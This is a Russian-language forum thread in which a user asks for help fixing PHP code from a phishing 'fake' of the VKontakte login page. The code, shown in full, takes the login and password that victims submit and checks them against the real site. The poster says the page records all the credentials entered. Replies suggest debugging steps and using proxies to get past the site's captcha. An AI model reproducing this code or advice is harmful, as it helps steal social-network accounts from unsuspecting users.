![]() |
Помогите разобраться в коде фейка!
Значит имею следующий код
$passwd = $_POST["pass"]; $klogin = $_POST["login"]; $sock = fsockopen("www.vkontakte.ru", 80); //Now check login & password $request = "GET /login.php?email=" . $klogin . "&pass=" . $passwd . " HTTP/1.1\r\n"; $request .= "Host: vkontakte.ru\r\n\r\n"; if(isset($sock) && $sock != null){ fputs($sock, $request); $answ = fread($sock,256); fclose($sock); } if (ereg("302 Found", $answ)) { $check = 1; } Php я не знаю ,но насколько я понял , в этом куске открывается сокс и передаются логин и пасс на сайт контакта , если их там нет ,то сервак возвращает значение "302 Found" ,.Так вот Вконтакте сменили что-ли возвращаемое значение ,если логин и пасс неверные?Как узнать возвращаемое значение КОНТАКТА ,если логин и пасс неверны? Ибо мой фейк записывает все введённые даннные в логин и пасс!Т.е это условие if (ereg("302 Found", $answ)) { $check = 1; никогда не бывает истинно! Программисты этого форума помогите пожалуйста))))) разобраться в чём тут дело! |
ошибся разделом
|
Попробуй поставить в fread значение больше раза в 3-4. Я особо не вдавался в тему...
Потом, если не поможет, сделай print_r($answ);. |
выкинь фейк либо прикручивай прокси. во всем капча виновата.
|
Цитата:
print_r($answ);. Ничего не выводит,значит сайт контакта никакого значения не возвращает.Если допустим присвоить ей какое-то значенеи перед выводом ,то выводит норм..так что всё правильно делаю. Мне тут сказали что я использую метод гет, а на сайте контакта используется метод пост. Попробую переписать в пост,поищу литературу! мне интересно почему ничего не возвращает перменная answ ? |
Цитата:
Капча выскакивает на полчаса , так почему же тогда тестируя на левом хосте первый раз залив фейк..и сразу заведемо ввёл неверные данные ,то не прокатила проверку на ошибку ? ведь первый раз если я ввожу неверно с конкретного айпишника с которого на контакт не заходили еще ,то капча не выскакивает..капча выскакивает на раз 3-5! |
Блин, так трудно самому посмотреть ответы сервера при удачной авторизации?
|
Цитата:
Я объявил переменные $passwd = $klogin = конкретными значениями..пробовал вводить правильные пароли и логины и неверные , результат один переменной answ ничего не передаёётся в сокете!Пробовал после закрытия сокета прописывать echo ($answ); ничего не выводит т.к. ничего из сокета и не передаётся..а вот почему не передаётся я и прошу помочь разобраться! |
| Время: 19:11 |